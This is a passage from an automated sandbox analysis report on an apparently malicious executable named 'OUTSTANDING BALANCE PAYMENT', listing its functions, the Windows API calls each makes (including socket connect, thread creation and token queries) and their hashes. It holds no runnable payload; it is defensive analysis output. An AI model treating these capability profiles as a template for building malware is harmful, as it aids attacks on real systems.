                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePostSleep$RectWindow
                                                                  • String ID:
                                                                  • API String ID: 3382505437-0
                                                                  • Opcode ID: 6bbc71dba07f91bae57e65b0ef82f31814b981ddbe751d22803b02b3b4104390
                                                                  • Instruction ID: 728707dd34962b7481509c8ace8654718f1a78747799e0679d31b5f31e0ececb
                                                                  • Opcode Fuzzy Hash: 6bbc71dba07f91bae57e65b0ef82f31814b981ddbe751d22803b02b3b4104390
                                                                  • Instruction Fuzzy Hash: 4031BA7191021AEBDF05CFA8D94DADE3BB9FB04319F104269F921AB1D1C7B09964CB90
                                                                  Function 002BDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 002BDBD7
                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002BDBF4
                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002BDC2C
                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002BDC52
                                                                  • _wcsstr.LIBCMT ref: 002BDC5C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                  • String ID:
                                                                  • API String ID: 3902887630-0
                                                                  • Opcode ID: bf2b36e47002b7cf6014949bf6796f20f5fa0655e4481358ca0ed55b55dc09bc
                                                                  • Instruction ID: 481e3db5cc0b5885362824fe8f3f2fdeac0dc41509c2cac0e08d82e85a0d5769
                                                                  • Opcode Fuzzy Hash: bf2b36e47002b7cf6014949bf6796f20f5fa0655e4481358ca0ed55b55dc09bc
                                                                  • Instruction Fuzzy Hash: 71213731224204BBEB155F789C49EFB7FACDF457A0F10803AF809CA081FAA1DC11D660
                                                                  Function 002BBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002BBC90
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002BBCC2
                                                                  • __itow.LIBCMT ref: 002BBCDA
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002BBD00
                                                                  • __itow.LIBCMT ref: 002BBD11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow
                                                                  • String ID:
                                                                  • API String ID: 3379773720-0
                                                                  • Opcode ID: 50c9206077a8631663a30c3fd723c0d67adc62d3c7a7ad0d8be00a781d37bef1
                                                                  • Instruction ID: 8cd2e4502929ffb0bc8908df25e5b92d3a0e6063ff3be12999004761a23d87a1
                                                                  • Opcode Fuzzy Hash: 50c9206077a8631663a30c3fd723c0d67adc62d3c7a7ad0d8be00a781d37bef1
                                                                  • Instruction Fuzzy Hash: 21210B356102187FDB16AE648C49FDF7FA8AF49350F000425F905EB181DBB4CD2587A1
                                                                  Function 002C6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002850E6: _wcsncpy.LIBCMT ref: 002850FA
                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,002C60C3), ref: 002C6369
                                                                  • GetLastError.KERNEL32(?,?,?,002C60C3), ref: 002C6374
                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002C60C3), ref: 002C6388
                                                                  • _wcsrchr.LIBCMT ref: 002C63AA
                                                                    • Part of subcall function 002C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,002C60C3), ref: 002C63E0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                  • String ID:
                                                                  • API String ID: 3633006590-0
                                                                  • Opcode ID: 6401c8619c43f2c5543d00eaecb9d3eacade3cba3e39e37b6f1c54af18c4d85a
                                                                  • Instruction ID: 0ab3e88d16eee743e072f5b9162a4f3d3f1cd225d0f5db12cc864c25da9ee30d
                                                                  • Opcode Fuzzy Hash: 6401c8619c43f2c5543d00eaecb9d3eacade3cba3e39e37b6f1c54af18c4d85a
                                                                  • Instruction Fuzzy Hash: 69210B315352564BDF15AFB8AC5AFEA239CAF05B60F1005EEF405C30C1EF60D9908E65
                                                                  Function 002D8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 002DA84E
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002D8BD3
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D8BE2
                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 002D8BFE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 3701255441-0
                                                                  • Opcode ID: 73cca680060c0f5ecda8f0c6b19742ce8a817ab9dcc9b386522fcd51c317b418
                                                                  • Instruction ID: e7104fc527cfa9e125d6cab1a6235ae23573c1353e16217f2cdf46139277063f
                                                                  • Opcode Fuzzy Hash: 73cca680060c0f5ecda8f0c6b19742ce8a817ab9dcc9b386522fcd51c317b418
                                                                  • Instruction Fuzzy Hash: 92219D312212149FCB15AF68CC95F7E77EDAB48710F04844AF956AB3D2CA70AC118B51
                                                                  Function 002D8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 002D8441
                                                                  • GetForegroundWindow.USER32 ref: 002D8458
                                                                  • GetDC.USER32(00000000), ref: 002D8494
                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 002D84A0
                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 002D84DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ForegroundPixelRelease
                                                                  • String ID:
                                                                  • API String ID: 4156661090-0
                                                                  • Opcode ID: 76714383cd4d08fab5ad65da621ca84492bac13e349bb8902f44d0dc8942d8f5
                                                                  • Instruction ID: 033ed44d294d8441322b459b210987f4828a3fc3c7a5c6cafc6a4b1aa920f3a2
                                                                  • Opcode Fuzzy Hash: 76714383cd4d08fab5ad65da621ca84492bac13e349bb8902f44d0dc8942d8f5
                                                                  • Instruction Fuzzy Hash: 2721A135A11204AFD700EFA4D889AAEBBE9EF48301F04847AE85997351CB70AC04CB60
                                                                  Function 0029AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0029AFE3
                                                                  • SelectObject.GDI32(?,00000000), ref: 0029AFF2
                                                                  • BeginPath.GDI32(?), ref: 0029B009
                                                                  • SelectObject.GDI32(?,00000000), ref: 0029B033
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                  • String ID:
                                                                  • API String ID: 3225163088-0
                                                                  • Opcode ID: 996415b19da89f71ba737d44db8b43fec5977b10cc241371d97296f6c3002c01
                                                                  • Instruction ID: 08e7f6129bc0aea2f9b0ba79aaa670f11c908df69823a97b434dbc143379a266
                                                                  • Opcode Fuzzy Hash: 996415b19da89f71ba737d44db8b43fec5977b10cc241371d97296f6c3002c01
                                                                  • Instruction Fuzzy Hash: 9121D67481070AEFCF23DF55EC487AA7B6CB711351F15431AE9259A0A0C7B4A8A1CF90
                                                                  Function 002A217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __calloc_crt.LIBCMT ref: 002A21A9
                                                                  • CreateThread.KERNEL32(?,?,002A22DF,00000000,?,?), ref: 002A21ED
                                                                  • GetLastError.KERNEL32 ref: 002A21F7
                                                                  • _free.LIBCMT ref: 002A2200
                                                                  • __dosmaperr.LIBCMT ref: 002A220B
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                  • String ID:
                                                                  • API String ID: 2664167353-0
                                                                  • Opcode ID: 6ee80394ae1a98a78196a7be90a63aaf40663db933fd4dd57cb7dbc5629aff92
                                                                  • Instruction ID: 884f23e89aa81d467f0713720b8a6de8433888a4a183a11634988572bf6bd1fe
                                                                  • Opcode Fuzzy Hash: 6ee80394ae1a98a78196a7be90a63aaf40663db933fd4dd57cb7dbc5629aff92
                                                                  • Instruction Fuzzy Hash: B311C832125307AFDB11AFA9DC41E5B7B99EF07770B10042AFD1886152DF71D8358AA5
                                                                  Function 002BABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 002BABD7
                                                                  • GetLastError.KERNEL32(?,002BA69F,?,?,?), ref: 002BABE1
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,002BA69F,?,?,?), ref: 002BABF0
                                                                  • HeapAlloc.KERNEL32(00000000,?,002BA69F,?,?,?), ref: 002BABF7
                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 002BAC0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 842720411-0
                                                                  • Opcode ID: cd47a2a88e13f432c32e5d3e7de496d692d1485a5a7ec3b51854453e408ad72c
                                                                  • Instruction ID: 0dcbb4c5a017a874f0ff901be096cab8e36b852e0f94fcb39dda66e40e0c29c6
                                                                  • Opcode Fuzzy Hash: cd47a2a88e13f432c32e5d3e7de496d692d1485a5a7ec3b51854453e408ad72c
                                                                  • Instruction Fuzzy Hash: 69016970211205BFDB154FA9DC58DAB7FACEF8A794B10042AF806C3260DA718C90CB60
                                                                  Function 002C7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002C7A74
                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002C7A82
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002C7A8A
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002C7A94
                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002C7AD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                  • String ID:
                                                                  • API String ID: 2833360925-0
                                                                  • Opcode ID: b625e3dd61c7879ea33543823cf26045bb1a6b6e529b87c054491d7f7fc0e8ad
                                                                  • Instruction ID: 70424cc1414717ae2735c10582e836dc9c6a0983e8ae70810185f0f1bbe2c378
                                                                  • Opcode Fuzzy Hash: b625e3dd61c7879ea33543823cf26045bb1a6b6e529b87c054491d7f7fc0e8ad
                                                                  • Instruction Fuzzy Hash: 11011735C15619EBDF05AFE5D858AEEBBB8FB18751F00055AE502B2250DF3096608BA1
                                                                  Function 002B9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CLSIDFromProgID.OLE32 ref: 002B9ADC
                                                                  • ProgIDFromCLSID.OLE32(?,00000000), ref: 002B9AF7
                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 002B9B05
                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 002B9B15
                                                                  • CLSIDFromString.OLE32(?,?), ref: 002B9B21
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 3897988419-0
                                                                  • Opcode ID: 535fe5760f42c446b35b48ecac789a9e10748bb70b61c0539f4064b252ca0b86
                                                                  • Instruction ID: a28fa25c24ac443d1b8608dcd438c43b636ed87df075c8e956838ffd8fcec915
                                                                  • Opcode Fuzzy Hash: 535fe5760f42c446b35b48ecac789a9e10748bb70b61c0539f4064b252ca0b86
                                                                  • Instruction Fuzzy Hash: 26018F7A621219BFDB118F98EC44BAA7BEDEF44395F148025FA05D2210D770DD909BA0
                                                                  Function 002BAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002BAA79
                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002BAA83
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002BAA92
                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002BAA99
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002BAAAF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: b4500085a02e3f953e92e46e3c8df8dbc0468652b9f85208dcad7209bced1f6f
                                                                  • Instruction ID: 5b8591a6ebc02ec70a38fa720e271dd9615a27fe4286ad52c6979337b67c162e
                                                                  • Opcode Fuzzy Hash: b4500085a02e3f953e92e46e3c8df8dbc0468652b9f85208dcad7209bced1f6f
                                                                  • Instruction Fuzzy Hash: D4F04975212205AFEB125FE4AC99EAB3BBCFF4A794F40042AF945C71A0DB609C51CA71
                                                                  Function 002BAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002BAADA
                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002BAAE4
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002BAAF3
                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002BAAFA
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002BAB10
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: 97f67bd21d21e73aecc17361074a4669be5fb9fd6f75ce2f6bdfdf0990d7dc3a
                                                                  • Instruction ID: e18c36537323c28365b4c0a5ca8f5681dd5e72f5092f16accc0f866c8994e15c
                                                                  • Opcode Fuzzy Hash: 97f67bd21d21e73aecc17361074a4669be5fb9fd6f75ce2f6bdfdf0990d7dc3a
                                                                  • Instruction Fuzzy Hash: 9BF062752112096FEB120FE4EC98EA73BADFF45798F00002AF955C7190CB609C51CB61
                                                                  Function 002BEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 002BEC94
                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 002BECAB
                                                                  • MessageBeep.USER32(00000000), ref: 002BECC3
                                                                  • KillTimer.USER32(?,0000040A), ref: 002BECDF
                                                                  • EndDialog.USER32(?,00000001), ref: 002BECF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3741023627-0
                                                                  • Opcode ID: 99f88d747002718a6c707dea0ddc982a3a2095d2ca2cc9df928103ebf8e7997f
                                                                  • Instruction ID: dbf16b272dd65eda9470e5a289e9072879313e3592775f87a41e3a4ecd753b09
                                                                  • Opcode Fuzzy Hash: 99f88d747002718a6c707dea0ddc982a3a2095d2ca2cc9df928103ebf8e7997f
                                                                  • Instruction Fuzzy Hash: E2018130510705ABEF256F50DE5EBD67BBCFB00B45F01055AB582A54E1DBF0AA98CB80
                                                                  Function 0029B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EndPath.GDI32(?), ref: 0029B0BA
                                                                  • StrokeAndFillPath.GDI32(?,?,002FE680,00000000,?,?,?), ref: 0029B0D6
                                                                  • SelectObject.GDI32(?,00000000), ref: 0029B0E9
                                                                  • DeleteObject.GDI32 ref: 0029B0FC
                                                                  • StrokePath.GDI32(?), ref: 0029B117
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                  • String ID:
                                                                  • API String ID: 2625713937-0
                                                                  • Opcode ID: eccea7a58926491f16e646bab8b64fc1d33616ef3cb56fd339c375a305c3a58a
                                                                  • Instruction ID: b56a8962124cec6d41bdd1c63bec26f2b672253081f00571031d79a0c7df909e
                                                                  • Opcode Fuzzy Hash: eccea7a58926491f16e646bab8b64fc1d33616ef3cb56fd339c375a305c3a58a
